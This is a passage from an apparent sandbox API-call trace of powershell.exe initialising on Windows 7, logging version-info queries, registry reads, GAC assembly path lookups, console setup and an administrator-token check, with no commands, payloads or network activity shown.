puLen=0x23e940) returned 1 [0142.883] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0142.883] lstrcpyW (in: lpString1=0x357e88, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fc4c, puLen=0x23e940) returned 1 [0142.883] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0142.883] lstrcpyW (in: lpString1=0x357e88, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fce8, puLen=0x23e940) returned 1 [0142.883] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0142.883] lstrcpyW (in: lpString1=0x357e88, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fd4c, puLen=0x23e940) returned 1 [0142.883] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0142.883] lstrcpyW (in: lpString1=0x357e88, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fdc8, puLen=0x23e940) returned 1 [0142.883] lstrlenW (lpString="6.1.7601.17514") returned 14 [0142.883] lstrcpyW (in: lpString1=0x357e88, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fa70, puLen=0x23e940) returned 1 [0142.883] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0142.883] lstrcpyW (in: lpString1=0x357e88, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x0, puLen=0x23e940) returned 0 [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x0, puLen=0x23e940) returned 0 [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x0, puLen=0x23e940) returned 0 [0142.884] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x23e938, puLen=0x23e934 | out: lplpBuffer=0x23e938*=0x292fa18, puLen=0x23e934) returned 1 [0142.884] VerLanguageNameW (in: wLang=0x0, szLang=0x357e88, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0142.884] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\", lplpBuffer=0x23e94c, puLen=0x23e948 | out: lplpBuffer=0x23e94c*=0x292f9a4, puLen=0x23e948) returned 1 [0142.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.890] GetLastError () returned 0xcb [0142.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.893] GetLastError () returned 0xcb [0142.896] lstrlenW (lpString="䅁") returned 1 [0142.899] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e910 | out: phkResult=0x23e910*=0x31c) returned 0x0 [0142.900] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e914 | out: phkResult=0x23e914*=0x320) returned 0x0 [0142.900] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e948 | out: phkResult=0x23e948*=0x324) returned 0x0 [0142.902] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e988, lpData=0x0, lpcbData=0x23e984*=0x0 | out: lpType=0x23e988*=0x1, lpData=0x0, lpcbData=0x23e984*=0x56) returned 0x0 [0142.903] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e988, lpData=0x357e88, lpcbData=0x23e984*=0x56 | out: lpType=0x23e988*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e984*=0x56) returned 0x0 [0142.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.932] GetLastError () returned 0x0 [0142.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.934] GetLastError () returned 0x0 [0142.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.938] GetLastError () returned 0x0 [0142.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.948] GetLastError () returned 0xcb [0143.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0143.189] GetLastError () returned 0x2 [0143.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0143.189] GetLastError () returned 0x2 [0143.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.288] GetLastError () returned 0xcb [0143.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.289] GetLastError () returned 0xcb [0143.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.315] GetLastError () returned 0xcb [0143.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.316] GetLastError () returned 0xcb [0143.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.316] GetLastError () returned 0xcb [0143.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0143.505] GetLastError () returned 0x0 [0143.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0143.506] GetLastError () returned 0x0 [0143.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.522] GetLastError () returned 0xcb [0143.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.523] GetLastError () returned 0xcb [0143.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.575] GetLastError () returned 0x7e [0143.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.575] GetLastError () returned 0x7e [0144.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0144.203] GetLastError () returned 0x2 [0144.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0144.204] GetLastError () returned 0x2 [0144.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0144.549] GetLastError () returned 0x57 [0144.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0144.549] GetLastError () returned 0x57 [0145.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0145.512] GetLastError () returned 0x2 [0145.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0145.513] GetLastError () returned 0x2 [0145.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0145.702] GetLastError () returned 0x2 [0145.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0145.702] GetLastError () returned 0x2 [0145.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.854] GetLastError () returned 0xcb [0145.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.854] GetLastError () returned 0xcb [0145.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.855] GetLastError () returned 0xcb [0145.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.855] GetLastError () returned 0xcb [0145.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.907] GetLastError () returned 0xcb [0146.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x23e45c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0146.255] GetLastError () returned 0x2 [0146.255] SetErrorMode (uMode=0x1) returned 0x1 [0146.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x23e904 | out: lpFileInformation=0x23e904*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.255] GetLastError () returned 0x2 [0146.255] SetErrorMode (uMode=0x1) returned 0x1 [0146.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.659] GetLastError () returned 0x0 [0146.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.659] GetLastError () returned 0x0 [0146.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.660] GetLastError () returned 0x0 [0146.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.663] GetLastError () returned 0xcb [0146.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.666] GetLastError () returned 0xcb [0146.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.666] GetLastError () returned 0xcb [0146.731] CoCreateGuid (in: pguid=0x23e9e4 | out: pguid=0x23e9e4*(Data1=0xd62857b5, Data2=0xd8de, Data3=0x4e36, Data4=([0]=0x98, [1]=0xf2, [2]=0xda, [3]=0x43, [4]=0xe8, [5]=0x52, [6]=0x4f, [7]=0xe8))) returned 0x0 [0146.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.740] GetLastError () returned 0xcb [0146.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.742] GetLastError () returned 0xcb [0146.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.743] GetLastError () returned 0xcb [0146.776] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0146.777] GetLastError () returned 0x0 [0146.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x23e8c4 | out: lpConsoleScreenBufferInfo=0x23e8c4) returned 1 [0146.778] GetLastError () returned 0x0 [0146.782] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0146.782] GetLastError () returned 0x0 [0146.782] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x23e8c4 | out: lpConsoleScreenBufferInfo=0x23e8c4) returned 1 [0146.782] GetLastError () returned 0x0 [0146.783] GetVersionExW (in: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0146.783] GetLastError () returned 0x0 [0146.784] GetCurrentProcess () returned 0xffffffff [0146.784] GetLastError () returned 0x3f0 [0146.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x23e8d4 | out: TokenHandle=0x23e8d4*=0x340) returned 1 [0146.785] GetLastError () returned 0x3f0 [0146.789] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x23e92c | out: TokenInformation=0x0, ReturnLength=0x23e92c) returned 0 [0146.789] GetLastError () returned 0x7a [0146.790] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x304828 [0146.790] GetLastError () returned 0x7a [0146.790] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x304828, TokenInformationLength=0x4, ReturnLength=0x23e92c | out: TokenInformation=0x304828, ReturnLength=0x23e92c) returned 1 [0146.790] GetLastError () returned 0x7a [0146.792] DuplicateTokenEx (in: hExistingToken=0x340, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x23e8e4 | out: phNewToken=0x23e8e4*=0x338) returned 1 [0146.792] GetLastError () returned 0x7f [0146.792] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x23e92c | out: TokenInformation=0x0, ReturnLength=0x23e92c) returned 0 [0146.792] GetLastError () returned 0x7a [0146.792] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3047d8 [0146.792] GetLastError () returned 0x7a [0146.792] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x3047d8, TokenInformationLength=0x4, ReturnLength=0x23e92c | out: TokenInformation=0x3047d8, ReturnLength=0x23e92c) returned 1 [0146.792] GetLastError () returned 0x7a [0146.793] CheckTokenMembership (in: TokenHandle=0x338, SidToCheck=0x29b27f0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x23e8c0 | out: IsMember=0x23e8c0) returned 1 [0146.793] GetLastError () returned 0x7a [0146.793] CloseHandle (hObject=0x338) returned 1 [0146.793] GetLastError () returned 0x7a [0146.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.793] GetLastError () returned 0x7a [0146.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.794] GetLastError () returned 0x7a [0146.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.794] GetLastError () returned 0x7a [0146.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.794] GetLastError () returned 0x7a [0146.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.857] GetLastError () returned 0x7a [0146.857] GetFullPathNameW (in: 